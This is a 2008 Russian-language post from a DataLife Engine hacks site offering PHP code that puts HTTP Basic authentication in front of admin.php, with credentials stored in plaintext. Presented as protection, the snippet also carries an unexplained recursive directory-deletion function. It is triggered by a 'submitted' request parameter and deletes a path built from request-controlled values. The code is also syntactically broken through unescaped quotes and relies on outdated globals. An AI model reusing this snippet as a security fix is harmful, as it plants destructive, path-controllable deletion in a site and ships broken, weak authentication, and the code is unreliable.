DataLife Engine > DLE хаки > Небольшой хак по защите Админцентра
Небольшой хак по защите Админцентра9 февраля 2008. Разместил: admin |
|
Небольшой хак по защите админки.
Т.е. при нажатии кнопки админцентр пояляется окошко с ASP авторизацией в котором необходимо указать свои данные. в файле admin.php в самое начало добавляем код: <?php require('указываем путь до файла/authorized.php'); function error ($error_message) { echo $error_message." "; exit; } if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN) && ( $PHP_AUTH_PW == "$PASSWORD" )) ) { header("WWW-Authenticate: Basic entrer="Form2txt admin""); header("HTTP/1.0 401 Unauthorized"); error("<h3>Unauthorized access...</h3>"); } function removedir ($dirb) { $dh=opendir($dirb); while ($file=readdir($dh)) { if($file!="." && $file!="..") { $fullpath=$dirb."/".$file; if(!is_dir($fullpath)) { unlink($fullpath); }else{ removedir($fullpath); } } } closedir($dh); if(rmdir($dirb)) { print "Directory:<font color="#FFCC00">[b]$dirb[/b]</font> deleted.<p />"; return true; }else{ return false; } } if ($_REQUEST['submitted']) { $dirc= "$abpath/$select"; removedir ($dirc); } ?> и далее создаем файл authorized.php в котором пишет следующий код: <?php //Переменные модуля authorized $LOGIN = "Ваш логин"; $PASSWORD = "ваш пароль"; ?> |